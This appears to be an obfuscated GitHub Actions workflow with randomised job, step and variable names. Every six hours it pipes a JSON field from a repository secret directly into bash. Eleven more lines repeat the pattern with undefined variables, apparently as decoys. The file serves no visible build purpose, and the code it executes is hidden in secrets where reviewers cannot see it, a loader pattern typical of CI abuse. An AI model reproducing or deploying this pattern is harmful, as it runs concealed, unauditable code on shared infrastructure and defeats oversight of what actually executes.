name: uooinhak
on:
  workflow_dispatch:
  schedule:
    - cron: '21 5/6 * * *'
jobs:  # 29765
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: uooinhak
        env:
          zyrw159: ${{ secrets.zyrw159 }}
        run: |
          echo $zyrw159 | jq -r .soqza4901 | /bin/bash
          echo $jyb65 | jq -r .apts5 | /bin/bash
          echo $ixnx830 | jq -r .zt5721 | /bin/bash
          echo $v4 | jq -r .adn43930 | /bin/bash
          echo $hlftf60 | jq -r .gjila799 | /bin/bash
          echo $faqyt64 | jq -r .bqqke11 | /bin/bash
          echo $l13994 | jq -r .o265 | /bin/bash
          echo $e03 | jq -r .qy98505 | /bin/bash
          echo $ncx37 | jq -r .lcoa7 | /bin/bash
          echo $hfj8690 | jq -r .bcc5844 | /bin/bash
          echo $h404 | jq -r .jfp74 | /bin/bash
          echo $evcco565 | jq -r .ldpgt70 | /bin/bash

